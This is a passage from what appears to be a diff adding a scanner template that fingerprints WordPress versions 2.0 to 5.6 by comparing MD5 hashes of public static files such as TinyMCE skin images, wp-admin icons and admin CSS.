"{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/embedded.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"f58daaa070dd4ea21bd6790f7ec36e22\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"56df04f9ee495d730f2dfa40e25773cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/more-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"6c2cd70b1c8972cf25b85e1e78a5251e\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"02d304f1d603ee26a48d87d9a1361b34\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"7852de09ac59b5589ed4dbdda4e4dee6\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"729f6aed63765d3887313825b7159612\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/gallery.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"a1065fb19f8c105077f9b4501055db34\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"52d0c08fe45aca3f662e81c738f5e209\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/video.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"d0c2b6f7a042a93d0d7abb1e83336ac1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"a56c7a563660776d5a421c730b8dcfd6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/more.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"fcb7bcd40abc0a6d003bfc0fcbabe67a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"6071a32f55470b99fda01bf6aedd20f9\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"5e93c2cc3619a9f9eaec32a5032a078e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"1ecaee31ec029ded0e18f576958a5214\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"7bce36bf2355513af7917c193e23ebd6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/audio.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"377e21e6dfe0008ef7c6d4fd2208770b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"e449e3da6dc51f85fc4c571179dd9348\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"24547f5689e6595dc6a12892296373a9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/utils/form_utils.js" + matchers: + - type: dsl + name: 4.8 - 5.6 + dsl: + - "(\"bf88fc6ca25582825493849f19fa4c69\" == md5(body))" + - type: dsl + name: 4.3 - 4.7.19 + dsl: + - "(\"f9c61354383f5a50a9a77b902dfdae7f\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"a32d1bbc44057b7dd0d2776ba2826b7c\" == md5(body))" + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"337d7e2efe224c1c7da72d40b612d0a6\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"13541f120c5fa567e36f8e10d6ddcfed\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"e33f3bde78ed04cd3039cd41c669f0c7\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"950d229c37a570fc26a13da71d73f9b8\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"5608617efb4362005e16dc09e876192c\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"dfd2287b76c0dc5f2318662c6472401c\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"d823ee2d04bfe2203a8d96392988db6d\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"2c31e4a356777665e4cf2c586e01bd17\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/utils/editable_selects.js" + matchers: + - type: dsl + name: 4.8 - 5.6 + dsl: + - "(\"a14a93897132a4a24927c64a9739ff45\" == md5(body))" + - type: dsl + name: 4.3 - 4.7.19 + dsl: + - "(\"eb642a0aba7a8666a7b1472230fcb374\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"79087fabcb00132181650bd80666c085\" == md5(body))" + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"8dd04768a81d784fbac5bb00876e808e\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"eae99e787007eaee6a7919bc2417f63a\" == md5(body))" + - type: dsl + name: 2.6 - 3.0.6 + dsl: + - "(\"6ae9d8d2ae563c29652b41b0ace13cc1\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"76f55e77dacb5ce55fb60ff56080d14c\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"80aeaa5b1ec8578fad591212a75d4b1a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/license.txt" + matchers: + - type: dsl + name: 4.8 - 5.6 + dsl: + - "(\"6f9589e0c8df783acd1760d203bafffa\" == md5(body))" + - type: dsl + name: 3.2 - 4.7.19 + dsl: + - "(\"045d04e17422d99e338da75b9c749b7c\" == md5(body))" + - type: dsl + name: 2.1 - 3.1.4 + dsl: + - "(\"0571cf371683742c14f1735079a78e38\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"05e4631bdeac86095c93799f91d1a45d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/crop/cropper.css" + matchers: + - type: dsl + name: 3.6 - 5.6 + dsl: + - "(\"6b79350bf46e0f692a4d1b2807ed0399\" == md5(body))" + - type: dsl + name: 2.1 - 3.5.2 + dsl: + - "(\"de9cb42ec723c60deb69440104800c22\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/crop/marqueeVert.gif" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"ae9accf100a4b9930639adff52d4dcc7\" == md5(body))" + - type: dsl + name: 2.1 - 3.4.2 + dsl: + - "(\"2b2adfe6df6517f146b5b7c5b86eda42\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/crop/marqueeHoriz.gif" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"8cccae9c1ebafdb83be602e4d44c6f0a\" == md5(body))" + - type: dsl + name: 2.1 - 3.4.2 + dsl: + - "(\"9b4c27fccf817923f59b78fa6099c376\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/crop/cropper.js" + matchers: + - type: dsl + name: 2.1 - 5.6 + dsl: + - "(\"1d97b296d918482e1273c56fbff6a8e2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/marker.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"3313dc2a4f322fd43349329cfde8191e\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"3e9aa4c85a09fe868e23d2ffb260df46\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"4f932ddbee5d5e9ebd89a2ec63eda2d1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-center-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"9ebeb22df3728735042a4a37a1496611\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/icons32.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"d1dbac5be76d39851ce74aa134cc1aea\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"db0235502fde48e086e206c574c8adae\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"08ec8b870b908c7568ca488dca99efe6\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"a2f0d6d446fe3352c8d99267d5618de6\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"23c825ff877459a4339cf7a7b2258141\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/se.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"d6c89442c360bd1e08da2e7d1527373a\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"e9b50c73bfb3dc46a1eccf07f4bfc6ab\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"6a47fff5fee2f97bbf3eaf5e3b2482d3\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"197eb3dfa27be4df10b35a57c0a7dde7\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"d88281faf9c249027c6d2a8991c9ffb5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-vs-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"4aa85a0c593cf769c7185911ae8462f8\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"a1331c4faa15c8d6fcb800eeec4c5500\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/post-formats32.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"57597e8f4f92f87bf02b5f4c896b453b\" == md5(body))" + - type: dsl + name: 3.6 - 4.0.32 + dsl: + - "(\"fbbcf81a2b6ce7e9e419fb639a8a2a24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/stars.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"5bace01f99903e3cf56bb27bd2ec2891\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9110d8c847f942a166db598574a118c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-right.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"42d8f3e2874f6523d36c403a502b2276\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"f1c033dd4d0600bf18af7ed9a7441ea5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/stars-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"f5ea4194a79c23e653b24d0c65032e5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/post-formats32-vs.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"b7742e45b6adea3547a54e1af3fe761c\" == md5(body))" + - type: dsl + name: 3.6 - 4.0.32 + dsl: + - "(\"b6c98d25500180cc6604d155f67651f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/imgedit-icons.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"4bd55c320b9fd9d8127da94789693b4f\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"45cbcb9891d6bcbf796e50fb6a6112db\" == md5(body))" + - type: dsl + name: 2.9 - 3.4.2 + dsl: + - "(\"fece88d437aba60350bce5273d4f1472\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-left.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"5cfd7930cffa6412f75af26f2e689ed4\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"731f8ceb9ea5cf3ad41810cf0af73821\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wordpress-logo.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"c6b0f979b9e66fc338f4cb3853a5608a\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a0baa50b279b79280c94acb65eb2426c\" == md5(body))" + - type: dsl + name: 2.5 - 3.3.3 + dsl: + - "(\"1a77b8aa7318b3e3b99e103aac47e448\" == md5(body))" + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"cc26f690d72afe4f2432d720e8fc6658\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/icons32-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"b525a42af908fafcf8cc07679ab4fabb\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"749a56fae96141ff576bb99c4037ebd9\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9de25e2c0691e2662252640d68a58a86\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/list.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"1e123e96bd2a1ce2c0d3b305d153f1c3\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"cce19b15b4d3e4ad7dac568f1a1c1f90\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/w-logo-white.png" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"6ea6ccee4a0176dba27ebb79ac175c85\" == md5(body))" + - type: dsl + name: 3.9 - 4.4.24 + dsl: + - "(\"af2ae1a60e2c4bdbec69fe6c87c63cad\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"d8d9f723f8f5254709712eb12ad74040\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"972051f086017dcef17964622336840b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-right-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"6883026cbd3e72ba5da36c57c60fc078\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-none-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"f858439905295bd705b09b2dba3418bd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-button-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"23db5749e51d85105cb8d03fc81305c9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/icons32-vs-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"a12a3034ff4734469709265a83697d22\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"4487c15d43389e88b3694803e2beaeb7\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"070f2b5a2faa29998e2ce1a91f0508d9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-center.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"09d91addb6b53479e68c645931d9658e\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"a1427c5dd8d6f9292430f6650824270a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-none.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"f1ad65716432a0a1da7591a5c2f10d04\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"de2bd2479bc66930d4db049e91b7451a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/arrows.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"7fda76920124f03e88d1dfd93e03bf59\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"9e6974860b99cef7eeb3b90e9e87f26a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/generic.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"f88e1b95ff278a5b231f39380b211ed0\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"ec85cdf6efc2a983e50f7d86a976c467\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wordpress-logo.svg" + matchers: + - type: dsl + name: 4.2 - 5.6 + dsl: + - "(\"f34ef6259364f7ef0ccf67cd1dddc970\" == md5(body))" + - type: dsl + name: 3.8 - 4.1.32 + dsl: + - "(\"b4419d2f79449b65dfe7036ef91cd1e8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/browser.png" + matchers: + - type: dsl + name: 4.3 - 5.6 + dsl: + - "(\"c1b2f9c29eb54b1f5c0284629524fe46\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/browser-rtl.png" + matchers: + - type: dsl + name: 4.6 - 5.6 + dsl: + - "(\"442291d9d3a041e41aaefebfbf25cc9d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/yes.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"c42bf814a237dc89970d715ae8516b13\" == md5(body))" + - type: dsl + name: 2.6 - 3.4.2 + dsl: + - "(\"94040f30512d9d0993f0b903b25024e2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"e10d8139230f1f8b64f35960098f8cff\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"48b8c0d56811b724ea34d7f052a126b3\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"dc29872da04b485add10ad8bd5c2e12b\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a6bc94f353aca3414b8d5eff539e4015\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"398887656a35c9956217380dc4e32d8c\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"1a36e748b6be3b15dfaa18b2149beefe\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"64327786ea2b3ac2bb12f54c698e5221\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/imgedit-icons-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"2ce3ee2783a33655a6bdfd9dc3cce174\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"22675b63c33b6e9b2a63e84018f44a0e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/align-left-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"698538b14fb9839aecd01d5e97c66316\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/comment-grey-bubble-2x.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"9d5459d3c59d32b602732c0df56d83bf\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"e1334238affb186ad35b2a79f8739e94\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/comment-grey-bubble.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"8f59128f2a27b489b0a974c0b6b21046\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"165ba7d3a093473cf47a6b0fbd141dbb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/icons32-vs.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"052cd6502a05e7d3f17b3e76a5b15566\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"d5a8c1950e1a20172151f463c8d9d489\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"a9a5cf708efb664e3bc3f216daec12ec\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"091cecbcaf2277683ad3c3a06d6d33dc\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"74426dbce10c55709c4877554d455c4e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-button.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"b2b6c3e336054070e8927a5e7965f3ce\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"970192c8af45d58e092c4e20f60ca059\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/no.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"c86bbf1c64c924f99fdc9f5637f0c08b\" == md5(body))" + - type: dsl + name: 2.6 - 3.4.2 + dsl: + - "(\"f787d0b0069027fc7b571dbbdabaa3c5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/post-formats-vs.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"a68f53a66c93f4485ca9acafaffc81e6\" == md5(body))" + - type: dsl + name: 3.6 - 4.0.32 + dsl: + - "(\"24726acea48e9bffc1744638f2d1f666\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-vs.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"719980f24cf02c0c5fa53b312fef45ac\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"73affbee3e5e3aec19199a657b4f88f7\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"016631a0b568350ef294f7aa9f44e0af\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"20243e9888a8e85e47320f5e10ec663d\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"8bef8c397f737a91ff8c4a2edbc16b36\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/list-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"68d5bb134953c23217fdd36982679a0c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/mask.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"fcf693677ea822e6d24af7b2e4a98e99\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"c6dc921c0d6f2197793d9174b4267ca0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wordpress-logo-white.svg" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"19bdd97150fb43aa862d53500c44e6f7\" == md5(body))" + - type: dsl + name: 3.8 - 4.4.24 + dsl: + - "(\"e1af633d59dcb5988cacff73b6dee9ff\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/post-formats.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"dc4bffe1d10093e4d92533a8d60cba07\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"cf8cdb0bc623dee2e18898b44b11744c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wheel.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"4530bd2071306dbbc61a592556b958a0\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"18568b368b3c5dfe7b67017a1ac3d329\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"2b6d304868ff398c17252b7b0a0414c4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-editor-rtl.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"143da4e979fd86e002fba6cda338cf7c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"1cc17a3f6fab84d7f5cdafb9a1e48f09\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"90d7daa9fa832b6ee628d44bac2914ed\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"d4c4155fff66945ef367f81b9f007f23\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"681c587be87f8084fd15ce13b1460c8f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b5eafb27263420dc587154987eefd9dc\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"af4e88597b7bafef229d9cfd7f78a7f0\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"9dad58e09b0522a67f359c9d85cd15a1\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"51a6eccc0e58e41141b938c556e2b622\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"c6dcd57eb62b059f20223ca862046a02\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"9407340fa00808af6c733322ccbe9a9e\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"01ae9946e7a7a08c32f1261d031c0320\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"fa029d751a7e76496019bd3a5a69f039\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"69d21af7f06b1347a33b42916e7b08d2\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"11cf82a7b3767ab36772ea1ac7dd2014\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"7e44b4a4422dc8db4efe76a8be193cb5\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"76d03147582cd99d51475f6bd651423d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"48180a7b52dd60bec1fc7a0ae2be0826\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-editor-rtl.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"464da848980476cd37de1c0d7964c1e4\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"9c1467e35e805d97da87d6df5b80f9c2\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"8de2501460648d4cb12d23774d21dd5f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-editor.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"2cf3344cb737ec622532596ac21cb85f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"2c096e4ab4c7c797f2f2017ac1fb7d20\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/l10n.css" + matchers: + - type: dsl + name: 4.6 - 5.6 + dsl: + - "(\"b5c4b8f85029fb7c84f0719f72b280ad\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"a611aee8ff502b5e2e28ea7ad2a4c211\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"4cd680a0941c3452ba43a54fca56a406\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"5dda0b5411fecbe1fac83dfe21c7540e\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"53825e0f13ec9497ea097b6d9d9ebf77\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"41ad7b492a52ebf1cc72d7d4f2f6dd2d\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ceae11d0b544effd0143146a689b60ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/farbtastic.css" + matchers: + - type: dsl + name: 3.8 - 5.6 + dsl: + - "(\"f9e33829b8faed7d7bbef843fb683255\" == md5(body))" + - type: dsl + name: 3.4 - 3.7.35 + dsl: + - "(\"90e8ee437da5a2fa7bd428a67182a198\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"b3e8340e402157e34c51510c2f192641\" == md5(body))" + - type: dsl + name: 2.7 - 3.2.1 + dsl: + - 